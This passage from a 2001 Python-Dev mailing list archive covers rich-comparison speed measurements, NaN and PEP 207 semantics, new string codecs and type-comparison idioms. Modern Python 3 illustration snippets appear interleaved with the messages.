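print(rich_compare(int_slots, 1, int_slots, 2, "<"))            # (True, 'fast')
print(rich_compare(float_slots, nan, float_slots, nan, "=="))   # (False, 'rich')
```

With the 3-way slot alone, the NaN comparison above would have come out equal (the 3-way result is 0), which is why a richcmp slot, when present, must win.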

BTW, tuples have a richcompare slot today and it's unclear that's a good
idea.  They do the same kind of Py_EQ/Py_NE "length check" you like for
strings, and I'd be surprised if that didn't cost more than it saves.  Unlike
strings, whenever I compare tuples they *always* have the same size (e.g.,
think of all the decorate-sort-undecorate ways tuples are used to augment sorts).

OK, across a full run of the test suite, tuplerichcompare() was called about
162000 times, all but about 50 times with Py_EQ or Py_NE.  The number of
times this code block at the start bore fruit:

	if (vt->ob_size != wt->ob_size && (op == Py_EQ || op == Py_NE)) {
		/* Shortcut: if the lengths differ, the tuples differ */
		PyObject *res;
		if (op == Py_EQ)
			res = Py_False;
		else
			res = Py_True;
		Py_INCREF(res);
		return res;
	}

was 0 -- the tuples were always the same size for Py_EQ/Py_NE, and the code
just burned cycles.  I want to move toward optimizations that save more than
they cost <0.7 wink>.
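That measurement is easy to reproduce in miniature. Below is a hypothetical instrumented equality test, not CPython's `tuplerichcompare`. It counts how often the length shortcut actually decides the result, run over decorated sort records.

```python
from collections import Counter


def tuple_eq(v, w, stats):
    """Tuple equality with a length shortcut, instrumented."""
    stats["calls"] += 1
    if len(v) != len(w):
        stats["shortcut_hits"] += 1  # the only case the shortcut pays off
        return False
    return all(a == b for a, b in zip(v, w))


# Decorate-sort-undecorate style records: every tuple has the same length,
# so the length test can never decide anything.
words = ["pear", "fig", "apple", "fig", "kiwi"]
decorated = [(len(word), i, word) for i, word in enumerate(words)]
stats = Counter()
for a, b in zip(decorated, decorated[1:]):
    tuple_eq(a, b, stats)
print(stats)  # Counter({'calls': 4})
```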

> ...
> For strings, I would still special-case tp_richcompare: when tracing
> calls to string_richcompare, I found that most calls with Py_EQ can
> be decided by checking that the string lengths are not equal.

I expect you'd also find that the current string_compare() usually decides
they're not equal on the first character comparison (which *it*
special-cases).  So special-casing on length isn't a clear win over what's
already done.  But, if it is, bravo!  Special-case the snot out of it without
calling *any* string functions (merely calling string_richcompare likely
costs a good deal more than comparing the lengths).
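In the same measuring spirit, here is a hypothetical Python helper that tallies which cheap check would, on its own, prove two strings unequal: length, first character, both, or neither. The sample pairs are made up. Real traces from the test suite would be needed before drawing any conclusion.

```python
from collections import Counter


def deciding_checks(a, b):
    """Which cheap checks alone prove a != b?"""
    by_length = len(a) != len(b)
    by_first = a[:1] != b[:1]  # slicing handles empty strings
    return {(True, True): "both",
            (True, False): "length only",
            (False, True): "first char only",
            (False, False): "neither"}[(by_length, by_first)]


pairs = [("spam", "eggs"), ("spam", "spa"), ("ham", "jam"), ("spam", "spat")]
tally = Counter(deciding_checks(a, b) for a, b in pairs)
print(tally)
```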

more-measuring-less-guessing-ly y'rs  - tim


From thomas@xs4all.net  Tue May 15 12:51:06 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 15 May 2001 13:51:06 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <200105150426.f4F4QVx01531@localhost.local>; from uche.ogbuji@fourthought.com on Mon, May 14, 2001 at 10:26:31PM -0600
References: <tim.one@home.com> <200105150426.f4F4QVx01531@localhost.local>
Message-ID: <20010515135106.A16811@xs4all.nl>

On Mon, May 14, 2001 at 10:26:31PM -0600, Uche Ogbuji wrote:

> I thought I was the only one getting all these silly Nigerian scam spams.  I 
> figured maybe they saw my name and decided to test on me (though they might 
> more cleverly have figured that a fellow Nigerian would be wise to the game).

Actually, one of my colleagues informed me that this spam is in fact *very
old* (after I ROTFL'd rather loudly reading the Dilbert comic featuring the
Nigerian spam a mere week after getting the spam myself :) Scott (my
colleague, not Adams) remembers first getting it by fax, 15 years ago, and
again several years later. And not just one fax, but every single fax in the
company, and lots more outside of the company. Apparently the telephone
operator issued a warning to all customers not to respond to the fax.

Still-sound-advice-ly y'rs,

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal@lemburg.com  Tue May 15 13:10:16 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 14:10:16 +0200
Subject: [Python-Dev] Easy codec access
Message-ID: <3B011CA8.9DDB4FC7@lemburg.com>

I've just checked in a set of patches which implement the new
.decode() method along with a couple of useful codecs.

You can now do things like these:

>>> "abc".encode('zlib').encode('base64')
'eJxLTEoGAAJNASc=\n'
>>> _.decode('base64').decode('zlib')
'abc'

>>> "abcäöü".decode('latin-1')
u'abc\xe4\xf6\xfc'

>>> "abcäöü".decode('latin-1').encode('latin-1')
'abc\xe4\xf6\xfc'

>>> "Hello World !".encode('rot13')
'Uryyb Jbeyq !'

So the overall codec experience should be a much better one
now.
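In Python 3 the bytes-to-bytes and text-to-text codecs are no longer reachable through the string methods. Assuming Python 3.4 or later, where the "zlib", "base64" and "rot13" aliases exist, the same round trips go through `codecs.encode()` and `codecs.decode()`:

```python
import codecs

packed = codecs.encode(codecs.encode(b"abc", "zlib"), "base64")
print(packed)  # base64 text of the zlib stream, ending in a newline
print(codecs.decode(codecs.decode(packed, "base64"), "zlib"))  # b'abc'

print(codecs.encode("Hello World !", "rot13"))                 # Uryyb Jbeyq !
print(b"abc\xe4\xf6\xfc".decode("latin-1").encode("latin-1"))  # b'abc\xe4\xf6\xfc'
```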

To see just how easy it is to write codecs, please have
a look at the string codecs I added in this patch (e.g.
zlib_codec.py or hex_codec.py). I am pretty sure that there
are a lot more useful things in the standard lib which could
benefit from these easy-to-use interfaces.
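To show how little a codec needs, here is a toy one-way codec along the lines of the consonant/vowel joke from the CP875 discussion above, registered with Python 3's `codecs.register()`. The codec name "kaka" and its functions are hypothetical. Because it returns text rather than bytes, it has to be called through `codecs.encode()`, not `str.encode()`.

```python
import codecs

VOWELS = set("aeiouAEIOU")


def kaka_encode(text, errors="strict"):
    """Map ASCII vowels to 'a', other ASCII letters to 'k'; keep the rest."""
    out = []
    for ch in text:
        if ch in VOWELS:
            out.append("a")
        elif ch.isascii() and ch.isalpha():
            out.append("k")
        else:
            out.append(ch)
    return "".join(out), len(text)  # codecs return (output, length consumed)


def kaka_decode(data, errors="strict"):
    raise UnicodeError("the kaka codec is deliberately one-way")


def search(name):
    """Codec search function: answers only for our hypothetical name."""
    if name == "kaka":
        return codecs.CodecInfo(kaka_encode, kaka_decode, name="kaka")
    return None


codecs.register(search)
print(codecs.encode("love", "kaka"))  # kaka
```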



From fredrik@pythonware.com  Tue May 15 13:11:26 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Tue, 15 May 2001 14:11:26 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
References: <tim.one@home.com> <200105150426.f4F4QVx01531@localhost.local> <20010515135106.A16811@xs4all.nl>
Message-ID: <005701c0dd38$2f417560$0900a8c0@spiff>

thomas wrote:

> Actually, one of my colleagues informed me that this spam is in fact
> *very old*

more info here:

http://home.rica.net/alphae/419coal/index.htm

    "A Five Billion US$ (as of 1996, much more now) worldwide
    Scam which has run since the early 1980's under Successive
    Governments of Nigeria.

    "The Nigerian Scam is, according to published reports, the
    Third to Fifth largest industry in Nigeria."

Cheers /F (highest offer this far: $155,000,000)


From guido@digicool.com  Tue May 15 16:27:31 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 10:27:31 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Tue, 15 May 2001 05:26:32 -0400."
 <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105151527.KAA28734@cj20424-a.reston1.va.home.com>

> [Martin v. Loewis]
> > Is this really exactly what Python would guarantee? I'm surprised that
> > x==x would always be true, but x!=x might be true also. In a type where
> > x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
> > I had expected that you'd reduced it to
> >
> >   if (v == w && op == Py_EQ) /* then return Py_True */
> >   if (v == w && op == Py_NE) /* then return Py_False */

[Tim]
> I agree that would be more analogous to what PyObject_Compare() does.
> 
> I'm not sure either make sense for rich comparisons; for example, under
> IEEE-754 rules, a NaN must compare not-equal to everything, including
> itself(!), and richcmps are the only hope Python users have of modeling that.
> Doing those pointer checks before giving richcmps a chance would kill that
> hope.  Can we agree to drop this one until somebody produces stats saying
> it's important?  I have no reason to suspect that it is.

PEP 207 is quite explicit that == and != are not to be assumed each
other's complement.  It is silent on the x==x issue but the PEP
mentions IEEE 754 so I agree that this also shouldn't be cut short.
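
The IEEE 754 point is easy to see from Python itself. This sketch (modern Python 3) shows that a NaN is unequal to itself, and that a user class can model the same thing only because `__eq__`/`__ne__` are actually called rather than short-circuited by an identity check. The class name `AlwaysUnequal` is a hypothetical example.

```python
import math

nan = float("nan")
assert math.isnan(nan)
# IEEE 754: NaN compares unequal to everything, itself included.
print(nan == nan, nan != nan)  # False True

class AlwaysUnequal:
    """Hypothetical NaN-like type expressed with rich comparisons."""
    def __eq__(self, other):
        return False
    def __ne__(self, other):
        return True

x = AlwaysUnequal()
# __eq__ runs even though both operands are the same object, so a
# "same pointer means equal" shortcut would give the wrong answer here.
print(x == x, x != x)  # False True
```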

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake@acm.org  Tue May 15 16:29:10 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Tue, 15 May 2001 11:29:10 -0400 (EDT)
Subject: [Python-Dev] Unicode docs
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
References: <3AFFA23F.248517E3@lemburg.com>
 <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
Message-ID: <15105.19270.62890.240534@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > The latter addresses several *fundamental* questions untouched by
 > the former, like what are the datatypes of the arguments and the
 > result, what values does errors accept, and what do they mean?  The
 > first blurb answers some more, like what's the default encoding,
 > and which exception is raised?  Neither is complete on its own, but
 > the reference manual should have a complete answer to all such
 > questions.  It doesn't have to go on at great length.

  I've beefed up the description of the unicode() function by merging
the information from AMK's document.

 > A round-trip example would be invaluable.
 > 
 > If Fred wanted to incorporate a brief overview too, a light rework of
 > Andrew/Moshe's writeup would be an excellent start.

  I'd love to have a contribution from someone with more knowledge of
what's there than me.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From guido@digicool.com  Tue May 15 17:35:09 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 11:35:09 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: Your message of "Tue, 15 May 2001 14:10:16 +0200."
 <3B011CA8.9DDB4FC7@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com>
Message-ID: <200105151635.LAA29530@cj20424-a.reston1.va.home.com>

> I've just checked in a set of patches which implement the new
> .decode() method along with a couple of useful codecs.

Cool!

> To see just how easy it is to write codecs, please have
> a look at the string codecs I added in this patch (e.g.
> zlib_codec.py or hex_codec.py). I am pretty sure that there
> are a lot more useful things in the standard lib which could
> benefit from these easy-to-use interfaces.

As an exercise, I added a quoted-printable codec.  It was easy
indeed!
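
Current Python 3 ships a quoted-printable codec under the alias `quopri`. A short round-trip sketch, assuming Python 3.4 or later (the sample bytes are arbitrary):

```python
import codecs

raw = b"caf\xe9 = ok"
encoded = codecs.encode(raw, "quopri")    # bytes-to-bytes codec
decoded = codecs.decode(encoded, "quopri")

print(encoded)  # the non-ASCII byte and "=" come out as =XX escapes
assert decoded == raw
```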

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik@effbot.org  Tue May 15 19:21:00 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Tue, 15 May 2001 20:21:00 +0200
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
Message-ID: <000901c0dd6b$cdb5d960$e46940d5@hagrid>

in case anyone has two hours to spare, and the right software,
MIT's dynamic languages group has posted a quicktime video of
their recent panel on language design.

http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html

(what 1/2 should result in, why it's good to have both CPython
and JPython, why whitespace is significant, why language design
is perhaps more related to architecture than math, and lots of
other goodies from Guy Steele and others)

Cheers /F


From nas@python.ca  Tue May 15 19:51:20 2001
From: nas@python.ca (Neil Schemenauer)
Date: Tue, 15 May 2001 11:51:20 -0700
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
In-Reply-To: <000901c0dd6b$cdb5d960$e46940d5@hagrid>; from fredrik@effbot.org on Tue, May 15, 2001 at 08:21:00PM +0200
References: <000901c0dd6b$cdb5d960$e46940d5@hagrid>
Message-ID: <20010515115120.A14357@glacier.fnational.com>

Fredrik Lundh wrote:
> in case anyone has two hours to spare, and the right software,
> MIT's dynamic languages group has posted a quicktime video of
> their recent panel on language design.
> 
> http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html

Does the streaming actually work for anyone?  I've given up and
started downloading the whole .mov files.

  Neil


From martin@loewis.home.cs.tu-berlin.de  Tue May 15 20:45:59 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 21:45:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>

> more-measuring-less-guessing-ly y'rs  - tim

Producing numbers is easy :-) I've instrumented my version where
string implements richcmp, and special-cases everything I can think
of. Counting is done for running the test suite. With this, I get

Calls to string_richcompare:   2378660
Calls with different types:      33992 (ie. one is not a string)
Calls with identical strings:   120517
Calls where lens decide !EQ:   1775716
----------------------------
Calls richcmp -> oldcomp:       448435
Total calls to oldcomp:        1225643
Calls oldcomp -> memcmp:        860174

So 5% of the calls are with identical strings, for which I can
immediately decide the outcome. 75% can be decided in terms of the
string lengths, which leaves ca. 19% for cases where lexicographical
comparison is needed.

In those cases, the first byte decides in 30%. If I remove the test
for "len decides !EQ", I get

#riches:                       2358322
#riches_ni:                      34108
#idents_decide:                 102050
#lens_decide:                        0
--------------------------------------
rest(computed):                2222164
#comps:                        2949421
#memcmps:                       917776

So still, ca. 30% can be decided by the first byte. It still appears that
the total number of calls to memcmp is higher when the length is not
taken into consideration. To verify this claim, I've counted the cases
where the length decides the outcome, and how many of those the first
byte would also have decided:

lens_decide:                    1784897
lens_decide_firstbyte_wouldhave:1671148

So in 6% of the cases, checking the length alone gives a decision
which looking at the first byte doesn't; plus it saves a function
call.
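
The decision order measured here (identity, then length, then first byte, then a full memcmp) can be modelled in a few lines of Python. This is a hypothetical sketch for illustration only, not the C patch itself; `bytes_eq` and `tally` are made-up names, and the step labels only loosely mirror the counters above.

```python
from collections import Counter

def bytes_eq(a: bytes, b: bytes):
    """Return (a == b, name of the step that decided the answer)."""
    if a is b:
        return True, "identity"       # same object: equal without looking
    if len(a) != len(b):
        return False, "length"        # different lengths can never be equal
    if a and a[0] != b[0]:
        return False, "first byte"    # cheap check before the full compare
    return a == b, "full compare"     # stands in for memcmp()

def tally(pairs):
    """Count which step decided each comparison, in the spirit of the counters above."""
    return Counter(step for _, step in (bytes_eq(a, b) for a, b in pairs))

s = b"spam"
print(tally([(s, s), (s, b"eggs!"), (s, b"ham!"), (s, b"spaM")]))
```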

To support the thesis that Py_EQ is the common case for strings, I
counted the various operations:

pyEQ:2271593
pyLE:9234
pyGE:0
pyNE:20470
pyLT:22765
pyGT:578

Now, that might be flawed since comparing strings for equality is
extremely frequent in the testsuite. To give more credibility to the
data, I also ran setup.py with my instrumented ./python:

riches:21640
riches_ni:76
riches_ni1:0
idents:2885
idents_decide:2885
lens_decide:9472
lens_decide_firstbyte_wouldhave:6223
comps:26360
memcmps:19224
pyEQ:20093
pyLE:46
pyGE:1
pyNE:548
pyLT:876
pyGT:0

That shows that optimizing for Py_NE is not worth it. With these data,
I'll upload a patch to SF.

Regards,
Martin


From tim@digicool.com  Tue May 15 21:22:37 2001
From: tim@digicool.com (Tim Peters)
Date: Tue, 15 May 2001 16:22:37 -0400
Subject: [Python-Dev] Comparison corner case
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEINCAAA.tim@digicool.com>

Here's the tail end of a patch comment.  If you believe the illustrated
behavior is wrong, then I don't believe we gain anything from using the
tp_richcmp slot for tuples for anything other than EQ/NE testing (the gain
for the latter is that it allows EQ/NE tuple comparison to work correctly on
tuples containing elements that support only EQ/NE comparisons):

"""
BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
because it won't believe there's any difference unless Py_EQ returns false
for some corresponding elements:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> C() < C()
1
>>> (C(),) < (C(),)
0
>>>

That doesn't make sense -- provided you believe the defn. of C makes sense.
"""
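
The behaviour above follows from a lexicographic scan that only ever asks `==` while looking for the first differing position, and then applies the requested operator to that pair (or to the lengths if no pair differs). A rough pure-Python model of that scan, assuming modern Python 3; `seq_richcmp` is a hypothetical name, and `C` is the class from the example with `True` in place of `1`:

```python
import operator

def seq_richcmp(v, w, op):
    """Model of tuple/list rich comparison; op is e.g. operator.lt."""
    for x, y in zip(v, w):
        # Only == is consulted while scanning for the first difference.
        if not x == y:
            return op(x, y)
    # Every shared position compared equal, so the lengths decide.
    return op(len(v), len(w))

class C:
    def __lt__(self, other):
        return True
    __eq__ = __lt__

print(C() < C())                                 # True
print(seq_richcmp((C(),), (C(),), operator.lt))  # False, since C() == C() is true
```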


From guido@digicool.com  Tue May 15 22:36:57 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 16:36:57 -0500
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: Your message of "Tue, 15 May 2001 13:13:01 MST."
 <E14zlBl-0004pj-00@usw-pr-cvs1.sourceforge.net>
References: <E14zlBl-0004pj-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <200105152136.QAA00489@cj20424-a.reston1.va.home.com>

Tim wrote:
> BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
> because it won't believe there's any difference unless Py_EQ returns false
> for some corresponding elements:
> 
> >>> class C:
> ...     def __lt__(x, y): return 1
> ...     __eq__ = __lt__
> ...
> >>> C() < C()
> 1
> >>> (C(),) < (C(),)
> 0
> >>>
> 
> That doesn't make sense -- provided you believe the defn. of C makes sense.

I think in this example the problem is with C, not with the tuple
algorithm.  The question is, what are you going to do otherwise?  You
could test for < first, == second -- but that means twice as many
comparisons, and for reasonably-behaved items it makes no difference
at all.
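
The cost argument can be checked with a small counting experiment. The sketch below uses hypothetical helpers (`Counted`, `eq_first_lt`, `lt_first_lt`, `count_calls`) in modern Python 3 to compute `v < w` for two lists with a long equal prefix, once with the ==-first scan and once with a "< first, == second" scan, counting the element comparisons each makes:

```python
class Counted:
    """Wraps an int and counts every == and < call made on any instance."""
    calls = 0

    def __init__(self, value):
        self.value = value

    def __eq__(self, other):
        Counted.calls += 1
        return self.value == other.value

    def __lt__(self, other):
        Counted.calls += 1
        return self.value < other.value

def eq_first_lt(v, w):
    """v < w the current way: scan with ==, then one < on the first difference."""
    for x, y in zip(v, w):
        if not x == y:
            return x < y
    return len(v) < len(w)

def lt_first_lt(v, w):
    """The alternative: try < first, then == to decide whether to go on.
    Assumes a total order (not < and not == implies >)."""
    for x, y in zip(v, w):
        if x < y:
            return True
        if not x == y:
            return False
    return len(v) < len(w)

def count_calls(fn, v, w):
    """Run fn(v, w) and return (result, number of element comparisons)."""
    Counted.calls = 0
    result = fn(v, w)
    return result, Counted.calls

# 100 equal leading items, then a difference in the last position.
v = [Counted(i) for i in range(100)] + [Counted(0)]
w = [Counted(i) for i in range(100)] + [Counted(1)]
print(count_calls(eq_first_lt, v, w))  # (True, 102)
print(count_calls(lt_first_lt, v, w))  # (True, 201)
```

Both scans give the same answer for well-behaved items; the <-first version roughly doubles the comparison count once the equal prefix is long.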

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@loewis.home.cs.tu-berlin.de  Tue May 15 21:59:56 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 22:59:56 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>

> Of course.  But except for instance objects, answering "does the type
> implement tp_richcompare?" is one lousy pointer check

Almost - you also have to check the type flag.

> and the answer will usually be-- provided we don't start stuffing
> code into *every* object's tp_richcompare slot! --"no, so I can go
> to tp_compare immediately".  Coercions and richcmps are the oddball
> cases today.

I'd like to add another data point, answering the question what types
are most frequently compared. The first set of data is for running the
Python testsuite.

riches      3040952  # Calls to PyType_RichCompare
eqs         2828345  # Calls where the types are equal

String      2323122
Float        141507
Int          125187
Type          99477
Tuple         84503
Long          30325
Unicode       10782
Instance       9335
List           2997
None            383
Class           318
Complex         219
Dict             57
Array            49
WeakRef          34
Function         11
File             11
SRE_Pattern      10
CFunction         9
Lock              8
Module            1

So strings cover 82% of all the compare calls of equally-typed
objects, followed by floats with 5%. Equally-typed calls, in turn,
make up 93% of all richcompare calls.

Since this might give a blurred view of what is actually used in
applications, I ran the PyXML testsuite with that python binary
also. Leaving out types that are not used, I get

riches        88465
eqs           59279

String        48097
Int            5681
Type           3170
Tuple           760
List            492
Float           332
Instance        269
Unicode         243
None            225
SRE_Pattern       4
Long              3
Complex           3

The first observation here is that "only" 67% of the calls are with
equally-typed objects. Of those, 80% are with strings, 9% with
integers.

The last example is IDLE, where I just did an "import httplib", for
fun.

riches        50923
eqs           49882

String        31198
Tuple          8312
Type           7978
Int            1456
None            600
SRE_Pattern     210
List            122
Instance          4
Float             1
Instance method   1

Roughly the same picture: 97% calls with equally-typed objects, of
those 62% strings, 3% integers. Notice the 15% for tuples and types,
each.

So to speed-up the common case clearly means to speed-up string
comparisons. If I'd need to optimize anything else afterwards, I'd
look into type objects - most likely, they are compared for EQ, which
can be done nicely and directly in a tp_richcompare also.

Those two optimizations together would give a richcompare to 95% of
the objects in the IDLE case.

Regards,
Martin


From guido@digicool.com  Tue May 15 23:41:12 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 17:41:12 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Tue, 15 May 2001 22:59:56 +0200."
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
Message-ID: <200105152241.RAA00926@cj20424-a.reston1.va.home.com>

I'm curious where the frequent comparisons of types come from.

Is there lots of code that does frequent

    assert type(x) == T

typechecking?

Does isinstance(x, T) perhaps use EQ?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry@digicool.com  Tue May 15 22:51:00 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Tue, 15 May 2001 17:51:00 -0400
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
 <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
Message-ID: <15105.42180.401918.223487@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido@digicool.com> writes:

    GvR> I'm curious where the frequent comparisons of types come
    GvR> from.

    GvR> Is there lots of code that does frequent

    GvR>     assert type(x) == T

    GvR> typechecking?

    GvR> Does isinstance(x, T) perhaps use EQ?

Not to mention the several hundred comparisons to None.


From jeremy@digicool.com  Tue May 15 18:26:54 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Tue, 15 May 2001 13:26:54 -0400 (EDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
 <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
Message-ID: <15105.26334.610144.846269@slothrop.digicool.com>

I only learned recently that isinstance() can be called with types
instead of classes.  I suppose the name led me in the wrong
direction.  I had the silly idea that it only applied to instances
<0.1 wink>.

So it comes as little surprise to me that there is a lot of code
executed in, e.g., the test suite that does comparisons on types.

In the Lib directory, there are 63 files that use == and the builtin
type function.  (Simple grep.)  A total of 139 instances of this
idiom.  A cursory scan suggests that most of the calls are things like
type(obj) == type('').

In the Zope source tree, there are 58 files and 98 individual
occurrences.  It again looks like comparisons against the string type are
the most common.

I can think of two common cases where an object is checked against the
string type.  One is an interface that takes a file-like object or its
path.  The other is an interface that takes a sequence, but doesn't
want to try a string as a sequence.

Sounds like we ought to do a search-and-destroy on type comparisons,
replacing with isinstance() where possible.
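
The two idioms described above might look like this with `isinstance()` instead of `type(...) == type('')`. A sketch in Python 3 spelling, where `str` plays the role of `StringType`; `open_source` and `flatten` are hypothetical helper names, not functions from the standard library or Zope:

```python
import io

def open_source(src):
    """Accept either a path name or an already-open file-like object."""
    if isinstance(src, str):          # was: type(src) == type('')
        return open(src)
    return src                        # assume it is already file-like

def flatten(items):
    """Flatten nested iterables, treating strings as atoms rather than sequences."""
    out = []
    for item in items:
        if isinstance(item, (str, bytes)):
            out.append(item)          # don't iterate over characters
            continue
        try:
            iter(item)
        except TypeError:
            out.append(item)          # not iterable: a leaf value
        else:
            out.extend(flatten(item))
    return out

print(open_source(io.StringIO("hello")).read())  # hello
print(flatten([1, "ab", [2, (3, "cd")]]))        # [1, 'ab', 2, 3, 'cd']
```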

Jeremy


From jeremy@digicool.com  Tue May 15 18:41:58 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Tue, 15 May 2001 13:41:58 -0400 (EDT)
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
In-Reply-To: <20010515115120.A14357@glacier.fnational.com>
References: <000901c0dd6b$cdb5d960$e46940d5@hagrid>
 <20010515115120.A14357@glacier.fnational.com>
Message-ID: <15105.27238.582785.851371@slothrop.digicool.com>

I downloaded one of the files, but the quicktime player I have on my
Windows box said it didn't understand the file format.  I eventually
got the streaming version at 100kbps to "work" where work meant
mostly an audio feed and occasional stills that were recognizable.

Jeremy

PS It was cool to watch the one on compilation.  Mat Hostetter, one of
the panelists, is my old roommate!


From barry@digicool.com  Tue May 15 23:56:10 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Tue, 15 May 2001 18:56:10 -0400
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
 <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
 <15105.26334.610144.846269@slothrop.digicool.com>
Message-ID: <15105.46090.203278.397835@anthem.wooz.org>

>>>>> "JH" == Jeremy Hylton <jeremy@digicool.com> writes:

    JH> I only learned recently that isinstance() can be called with
    JH> types instead of classes.  I suppose the name led me in the
    JH> wrong direction.  I had the silly idea that it only applied to
    JH> instances <0.1 wink>.

    JH> So it comes as little surprise to me that there is a lot of
    JH> code executed in, e.g., the test suite that does comparisons
    JH> on types.

    JH> In the Lib directory, there are 63 files that use == and the
    JH> builtin type function.  (Simple grep.)  A total of 139
    JH> instances of this idiom.  A cursory scan suggests that most of
    JH> the calls are things like type(obj) == type('').

Even without the forward-looking insight that types are classes
<wink>, I think type comparisons should have been done with `is' and
not ==.  So old school type comparisons should have been done as

    type(obj) is StringType

whereas new school type comparisons should be done as

    isinstance(obj, StringType)

With Python 2.1, == is naturally slower than `is', while isinstance()
comes in somewhere in the middle.

563897.802881 is comparisons per second
506827.201066 == comparisons per second
520696.916088 isinstance() comparisons per second

-Barry

-------------------- snip snip --------------------
from types import StringType
import time
r = range(1000000)

def one(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) is StringType
    t1 = time.time() - t0
    print len(r) / t1, 'is comparisons per second'

def two(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) == StringType
    t1 = time.time() - t0
    print len(r) / t1, '== comparisons per second'

def three(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        isinstance(x, StringType)
    t1 = time.time() - t0
    print len(r) / t1, 'isinstance() comparisons per second'


one()
two()
three()
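
On a current Python 3 the same measurement is more commonly made with the `timeit` module, which runs the loop and picks the timer. A sketch, assuming Python 3.6 or later, with `str` standing in for `types.StringType`; `rates()` is a hypothetical helper, and the numbers it prints will vary by machine and interpreter version, so none are shown here:

```python
import timeit

def rates(number=1_000_000):
    """Return comparisons per second for each spelling of the type test."""
    namespace = {"x": "hello"}
    stmts = {
        "is": "type(x) is str",
        "==": "type(x) == str",
        "isinstance()": "isinstance(x, str)",
    }
    return {
        label: number / timeit.timeit(stmt, globals=namespace, number=number)
        for label, stmt in stmts.items()
    }

for label, rate in rates().items():
    print(f"{rate:,.0f} {label} comparisons per second")
```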

From tim.one@home.com  Wed May 16 00:49:03 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 19:49:03 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>
